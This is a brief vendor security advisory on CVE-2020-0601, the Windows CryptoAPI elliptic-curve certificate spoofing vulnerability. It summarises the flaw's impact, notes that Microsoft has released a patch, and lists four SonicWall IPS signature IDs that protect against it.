Windows CryptoAPI Spoofing Vulnerability CVE-2020-0601

January 14, 2020

NSA has discovered a critical vulnerability affecting Microsoft Windows cryptographic functionality. A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. The vulnerability affects Windows 10 and Windows Server 2016/2019 as well as applications that rely on Windows for trust functionality.

Microsoft released a patch today for Windows CryptoAPI Spoofing Vulnerability (CVE-2020-0601) and urges that everyone update their systems as quickly as possible.

A successful exploit could allow the attacker to
(1) Sign a malicious executable, making it appear the file was from a trusted, legitimate source; the user would have no way of knowing the file was malicious, because the digital signature would appear to be from a trusted provider.
(2) Conduct man-in-the-middle attacks and decrypt confidential information on user connections to the affected software.

SonicWall Capture Labs Threat Research team provides protection against this vulnerability with the following signatures:
IPS 14728:Windows CryptoAPI Spoofing Vulnerability (JAN 20) 1
IPS 14729:Windows CryptoAPI Spoofing Vulnerability (JAN 20) 2
IPS 14730:Windows CryptoAPI Spoofing Vulnerability (JAN 20) 3
IPS 14731:Windows CryptoAPI Spoofing Vulnerability (JAN 20) 4